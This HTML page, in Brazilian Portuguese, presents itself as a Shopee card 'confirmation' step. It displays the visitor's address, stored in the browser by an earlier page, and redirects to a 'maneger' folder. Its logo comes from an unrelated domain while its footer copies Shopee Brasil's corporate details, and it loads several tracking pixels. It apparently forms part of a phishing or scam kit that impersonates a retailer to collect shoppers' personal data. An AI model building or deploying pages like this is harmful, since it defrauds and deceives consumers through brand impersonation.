﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cartão Shopee - Confirmação</title>
    <link href="https://cdn.jsdelivr.net/npm/remixicon@2.5.0/fonts/remixicon.css" rel="stylesheet">





    <script>
        window.pixelId = "675fc2adbe7dec4a0a382d31";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
      </script>
      
      
      <script
        src="https://cdn.utmify.com.br/scripts/utms/latest.js"
        data-utmify-prevent-subids
        async
        defer
      ></script>
      
      <!-- Meta Pixel Code -->
      <script>
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '9027210824040972');
      fbq('track', 'PageView');
      </script>
      <noscript><img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=9027210824040972&ev=PageView&noscript=1"
      /></noscript>
      <!-- End Meta Pixel Code -->






    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Inter', sans-serif;
        }

        body {
            background-color: #f6f6f6;
            color: #1a1a1a;
            line-height: 1.6;
        }

        .header {
            background: #EE4D2D;
            color: #ffffff;
            padding: 1rem 0;
            text-align: center;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .main-content {
            max-width: 480px;
            background-color: #ffffff;
            padding: 2rem;
            border-radius: 12px;
            margin: 40px auto;
            box-shadow: 0 4px 6px rgba(0,0,0,0.05);
            border: 1px solid #f0f0f0;
        }

        .title {
            color: #1F2937;
            font-size: 1.25rem;
            font-weight: 600;
            margin-bottom: 2rem;
        }

        .address-container {
            background: #FFF5F3;
            border: 1px solid rgba(238, 77, 45, 0.1);
            border-radius: 12px;
            padding: 1.5rem;
            margin-bottom: 1.5rem;
        }

        .address-item {
            display: flex;
            align-items: flex-start;
            gap: 1rem;
            margin-bottom: 1rem;
            padding: 0.5rem;
            background: white;
            border-radius: 8px;
            transition: all 0.2s ease;
        }

        .address-item:last-child {
            margin-bottom: 0;
        }

        .address-item:hover {
            transform: translateX(4px);
        }

        .address-item i {
            color: #EE4D2D;
            font-size: 1.25rem;
            flex-shrink: 0;
        }

        .address-content {
            flex: 1;
            color: #4B5563;
            font-size: 0.9375rem;
            padding: 0.25rem 0;
        }

        .btn-custom {
            background: linear-gradient(135deg, #EE4D2D 0%, #FF6B4B 100%);
            color: white;
            border: none;
            width: 100%;
            padding: 1rem 2rem;
            border-radius: 50px !important;
            font-size: 1rem;
            font-weight: 500;
            cursor: pointer;
            transition: all 0.3s ease;
            margin-top: 1rem;
        }

        .btn-custom:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(238, 77, 45, 0.2);
        }

        .footer {
            background-color: #1a1a1a;
            color: #f5f5f5;
            text-align: center;
            padding: 2rem 1rem;
            border-bottom: solid 3px #EE4D2D;
            font-size: 0.875rem;
        }

        @media (max-width: 768px) {
            .main-content {
                margin: 1rem;
                padding: 1.5rem;
            }

            .address-container {
                padding: 1rem;
            }
        }
    </style>
</head>      
<body>
<div style="display: grid; grid-template-areas: 'top-bar' 'content' 'footer'; grid-template-rows: auto 1fr auto; min-height: 100vh;">   
    <div class="header">
        <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div class="main-content">
            <div id="confirmacao-dados-secao">
                <h5 class="title">Seus dados estão corretos?</h5>
                <div class="address-container" id="dados-endereco"></div>
                <button class="btn btn-custom" onclick="confirmarDados()">
                    Confirmar dados e continuar
                </button>
            </div>
        </div>
    </div>

    <div class="footer">
        © 2025 Shopee Brasil. CNPJ: 35.635.824/0001-12<br>
        Av. das Nações Unidas, 3003 - Bonfim, Osasco - SP, 06233-903
    </div>
</div>

<script>
    function carregarDadosEndereco() {
        const rua = localStorage.getItem('rua') || '';
        const numero = localStorage.getItem('numero') || '';
        const complemento = localStorage.getItem('complemento') || '';
        const bairro = localStorage.getItem('bairro') || '';
        const cidade = localStorage.getItem('cidade') || '';
        const estado = localStorage.getItem('estado') || '';
        const cep = localStorage.getItem('cep') || '';

        const endereco = `
            <div class="address-item">
                <i class="ri-map-pin-line"></i>
                <div class="address-content">${rua}, ${numero} ${complemento ? ', ' + complemento : ''}</div>
            </div>
            <div class="address-item">
                <i class="ri-building-line"></i>
                <div class="address-content">${bairro}</div>
            </div>
            <div class="address-item">
                <i class="ri-map-2-line"></i>
                <div class="address-content">${cidade}/${estado}</div>
            </div>
            <div class="address-item">
                <i class="ri-mail-line"></i>
                <div class="address-content">${cep}</div>
            </div>
        `;

        document.getElementById('dados-endereco').innerHTML = endereco;
    }

    carregarDadosEndereco();

    function confirmarDados() {
        location.href = 'maneger/index.php.html';
    }
</script>

<script src="https://cdn.utmify.com.br/scripts/utms/latest.js" data-utmify-prevent-subids async defer></script>
<script>
    window.pixelId = "678838a121a1854bae5e0469";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);
</script>
</body>
</html>